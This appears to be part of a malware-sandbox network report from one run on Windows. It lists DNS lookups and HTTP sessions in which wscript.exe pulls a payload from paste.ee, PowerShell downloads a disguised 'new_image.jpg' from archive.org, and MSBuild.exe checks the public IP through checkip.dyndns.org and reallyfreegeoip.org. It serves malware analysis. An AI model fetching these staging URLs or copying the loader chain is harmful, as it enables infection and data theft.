                                                                                                                                  Apr 28, 2025 13:24:36.813082933 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813088894 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813114882 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813132048 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813159943 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813179970 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813206911 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813215017 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813240051 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813260078 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813334942 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813354015 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813389063 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813395977 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813420057 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813437939 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813529015 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813544989 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813585043 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813591957 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813602924 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813621998 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813625097 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813635111 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.813652992 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.813687086 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814316034 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814330101 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814373970 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814383984 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814421892 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814503908 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814538956 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814552069 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814558029 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814574957 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814593077 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814593077 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814603090 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814640999 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814644098 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814661026 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814690113 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814742088 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814747095 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814755917 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814774990 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814799070 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814805031 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814826965 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814862967 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814862967 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814873934 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814888954 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814909935 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814935923 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.814940929 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.814974070 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815030098 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815045118 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815093040 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815099955 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815144062 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815205097 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815223932 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815258980 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815264940 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815285921 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815289974 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815304041 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815310955 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815320969 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815336943 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815371037 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815490007 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815504074 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815542936 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815551043 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815588951 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815654993 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815675020 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815700054 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815706015 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815718889 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815732956 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815742016 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815747976 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815763950 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815772057 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815805912 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815809965 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815845013 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815881968 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815927029 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815932035 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815939903 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.815969944 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.815982103 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816054106 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816073895 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816119909 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816126108 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816158056 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816204071 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816219091 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816250086 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816266060 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816298008 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816298008 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816359043 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816375017 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816415071 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816421032 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816435099 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816453934 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816457033 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816467047 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816483021 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816514969 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816678047 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816700935 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816731930 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816739082 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816751957 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Apr 28, 2025 13:24:08.293126106 CEST5127153192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:08.433346987 CEST53512711.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:23.253813982 CEST6520353192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:23.394234896 CEST53652031.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:33.944180965 CEST5408753192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:34.084604025 CEST53540871.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:34.844441891 CEST5978353192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:35.011960983 CEST53597831.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.443785906 CEST6500853192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:37.585602045 CEST53650081.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.905477047 CEST5034453192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:39.045752048 CEST53503441.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:39.539395094 CEST5891153192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:39.702446938 CEST53589111.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 28, 2025 13:24:08.293126106 CEST | 192.168.2.6 | 1.1.1.1 | 0xbfb1 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:23.253813982 CEST | 192.168.2.6 | 1.1.1.1 | 0x7b93 | Standard query (0) | c.pki.goog | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:33.944180965 CEST | 192.168.2.6 | 1.1.1.1 | 0x8397 | Standard query (0) | archive.org | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:34.844441891 CEST | 192.168.2.6 | 1.1.1.1 | 0x45c4 | Standard query (0) | ia801700.us.archive.org | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:37.443785906 CEST | 192.168.2.6 | 1.1.1.1 | 0x1db1 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:38.905477047 CEST | 192.168.2.6 | 1.1.1.1 | 0x6c7d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.539395094 CEST | 192.168.2.6 | 1.1.1.1 | 0xf91e | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 28, 2025 13:24:08.433346987 CEST | 1.1.1.1 | 192.168.2.6 | 0xbfb1 | No error (0) | paste.ee | | 23.186.113.60 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:22.478688955 CEST | 1.1.1.1 | 192.168.2.6 | 0x8df4 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:22.478688955 CEST | 1.1.1.1 | 192.168.2.6 | 0x8df4 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:23.394234896 CEST | 1.1.1.1 | 192.168.2.6 | 0x7b93 | No error (0) | c.pki.goog | pki-goog.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 28, 2025 13:24:23.394234896 CEST | 1.1.1.1 | 192.168.2.6 | 0x7b93 | No error (0) | pki-goog.l.google.com | | 192.178.49.195 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:34.084604025 CEST | 1.1.1.1 | 192.168.2.6 | 0x8397 | No error (0) | archive.org | | 207.241.224.2 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:35.011960983 CEST | 1.1.1.1 | 192.168.2.6 | 0x45c4 | No error (0) | ia801700.us.archive.org | | 207.241.233.30 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:37.585602045 CEST | 1.1.1.1 | 192.168.2.6 | 0x1db1 | No error (0) | paste.ee | | 23.186.113.60 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.045752048 CEST | 1.1.1.1 | 192.168.2.6 | 0x6c7d | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 28, 2025 13:24:39.045752048 CEST | 1.1.1.1 | 192.168.2.6 | 0x6c7d | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.045752048 CEST | 1.1.1.1 | 192.168.2.6 | 0x6c7d | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.045752048 CEST | 1.1.1.1 | 192.168.2.6 | 0x6c7d | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.045752048 CEST | 1.1.1.1 | 192.168.2.6 | 0x6c7d | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.045752048 CEST | 1.1.1.1 | 192.168.2.6 | 0x6c7d | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.702446938 CEST | 1.1.1.1 | 192.168.2.6 | 0xf91e | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.702446938 CEST | 1.1.1.1 | 192.168.2.6 | 0xf91e | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.702446938 CEST | 1.1.1.1 | 192.168.2.6 | 0xf91e | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.702446938 CEST | 1.1.1.1 | 192.168.2.6 | 0xf91e | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.702446938 CEST | 1.1.1.1 | 192.168.2.6 | 0xf91e | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.702446938 CEST | 1.1.1.1 | 192.168.2.6 | 0xf91e | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Apr 28, 2025 13:24:39.702446938 CEST | 1.1.1.1 | 192.168.2.6 | 0xf91e | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
                                                                                                                                  • paste.ee
                                                                                                                                  • archive.org
                                                                                                                                  • ia801700.us.archive.org
                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                  • c.pki.goog
                                                                                                                                  • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49685 | 23.186.113.60 | 80 | 7148 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
Apr 28, 2025 13:24:08.595148087 CEST | 178 | OUT | GET /d/fa7OMk20/0 HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-ch
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                  Host: paste.ee
Apr 28, 2025 13:24:08.747081041 CEST | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:08 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 178
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Location: https://paste.ee/d/fa7OMk20/0
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.6 | 49691 | 192.178.49.195 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 28, 2025 13:24:23.544055939 CEST | 200 | OUT | GET /r/r4.crl HTTP/1.1
                                                                                                                                  Cache-Control: max-age = 3000
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: */*
                                                                                                                                  If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                  User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                  Host: c.pki.goog
Apr 28, 2025 13:24:23.692045927 CEST | 1243 | IN | HTTP/1.1 200 OK
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                  Content-Length: 530
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Server: sffe
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  Date: Mon, 28 Apr 2025 10:50:42 GMT
                                                                                                                                  Expires: Mon, 28 Apr 2025 11:40:42 GMT
                                                                                                                                  Cache-Control: public, max-age=3000
                                                                                                                                  Age: 2021
                                                                                                                                  Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT
                                                                                                                                  Content-Type: application/pkix-crl
                                                                                                                                  Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49696 | 158.101.44.242 | 80 | 6720 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
Apr 28, 2025 13:24:39.211945057 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
Apr 28, 2025 13:24:39.373764038 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 106
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 85c12f6e3814231d304a6cc30eababb9
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.244.56.186</body></html>
Apr 28, 2025 13:24:39.377840996 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
Apr 28, 2025 13:24:39.537199974 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 106
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 69944972459f400f7970de768e0ff8cb
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.244.56.186</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49686 | 23.186.113.60 | 443 | 7148 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2025-04-28 11:24:09 UTC | 154 | OUT | GET /d/fa7OMk20/0 HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: */*
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                  Host: paste.ee
2025-04-28 11:24:10 UTC | 953 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:09 GMT
                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                  Content-Length: 1448273
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Cache-Control: max-age=2592000
                                                                                                                                  X-Varnish: 43979760 44108644
                                                                                                                                  Age: 50
                                                                                                                                  Via: 1.1 varnish (Varnish/6.2)
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Strict-Transport-Security: max-age=63072000
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49693 | 207.241.224.2 | 443 | 6852 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-28 11:24:34 UTC | 127 | OUT | GET /download/new_image_20250413/new_image.jpg HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0
                                                                                                                                  Host: archive.org
                                                                                                                                  Connection: Keep-Alive
2025-04-28 11:24:34 UTC | 1947 | IN | HTTP/1.1 302 Found
                                                                                                                                  Server: nginx/1.24.0
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:34 GMT
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Location: https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpg
                                                                                                                                  Strict-Transport-Security: max-age=15724800
                                                                                                                                  Onion-Location: https://archivep75mbjunhxc6x4j5mwjmomyxb573v42baldlqu56ruil2oiad.onion/download/new_image_20250413/new_image.jpg
                                                                                                                                  Content-Security-Policy: report-uri https://archive.org/services/csp-report; default-src *; img-src * data: blob:; object-src 'none'; media-src * blob:; connect-src * data:; style-src 'unsafe-inline' https://archive.org/ https://archive.org https://esm.archive.org/ https://esm.ext.archive.org/ https://offshoot.prod.archive.org/ https://av.archive.org/css/ https://av.dev.archive.org/css/ https://accounts.google.com/gsi/ https://synerg.adp.com/; script-src 'nonce-46f6173e753d7c5c6ddd54f96d334d70' https://archive.org/includes/ https://archive.org/includes/ https://archive.org/components/ https://archive.org/components/ https://archive.org/v/ https://archive.org/v/ https://archive.org/upload/app/ https://archive.org/offshoot_assets/ https://archive.org/offshoot_assets/ https://esm.archive.org/ https://esm.ext.archive.org/ https://polyfill.archive.org/v3/polyfill.min.js https://offshoot.prod.archive.org/ https://av.archive.org/ https://av.dev.archive.org/ https://openlibrary.org/query.json https://emularity-user [TRUNCATED]
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
2025-04-28 11:24:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49694 | 207.241.233.30 | 443 | 6852 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-28 11:24:35 UTC | 138 | OUT | GET /6/items/new_image_20250413/new_image.jpg HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0
                                                                                                                                  Host: ia801700.us.archive.org
                                                                                                                                  Connection: Keep-Alive
2025-04-28 11:24:35 UTC | 582 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.24.0
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:35 GMT
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 3172652
                                                                                                                                  Last-Modified: Sun, 13 Apr 2025 17:38:51 GMT
                                                                                                                                  Connection: close
                                                                                                                                  ETag: "67fbf6ab-30692c"
                                                                                                                                  Strict-Transport-Security: max-age=15724800
                                                                                                                                  Expires: Mon, 28 Apr 2025 17:24:35 GMT
                                                                                                                                  Cache-Control: max-age=21600
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                  Accept-Ranges: bytes


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
